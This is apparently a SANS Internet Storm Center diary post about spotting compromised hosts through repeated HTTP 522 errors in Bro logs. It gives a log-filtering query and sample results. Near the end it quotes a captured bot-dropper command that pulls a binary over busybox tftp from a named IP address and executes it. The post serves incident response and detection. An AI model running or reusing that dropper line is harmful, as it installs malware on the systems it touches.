from SANS Internet Storm Center, InfoCON: green
Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) to keep an eye on HTTP error code 522 for possible malware check-ins. 522 code could mean several things, but as for IR it's a potential malicious host has been pulled offline and you have a client still trying to connect. So I got our Intern to check bro logs and see what he could find.
>zcat http* | bro-cut ts id.orig_h id.resp_h host status_code | awk '$5 == "522"
1467159441.247406 192.128.1.216 104.27.182.19 - 522
1467160356.407366 192.128.1.216 104.27.183.19 - 522
1467161271.647320 192.128.1.216 104.27.183.19 - 522
1467163102.087490 192.128.1.216 104.27.183.19 - 522
1467164017.337316 192.128.1.216 104.27.183.19 - 522
1467164932.547084 192.128.1.216 104.27.182.19 - 522
….
1467182323.201685 192.128.1.216 104.27.182.19 - 522
1467183238.447046 192.128.1.216 104.27.183.19 - 522
1467184153.641505 192.128.1.216 104.27.183.19 - 522
1467185068.903194 192.128.1.216 104.27.182.19 - 522
…
There was other traffic that was false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed bro logs for the day we only had about 200 total lines that matched, so very low noise ratio.
When looking at the full packet capture of the system in question, we were able to tell that the system in question was compromised and downloaded a bot .
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
This is certainly something we are going to keep looking at for finding more compromised system.
--
Tom Webb
@twsecblog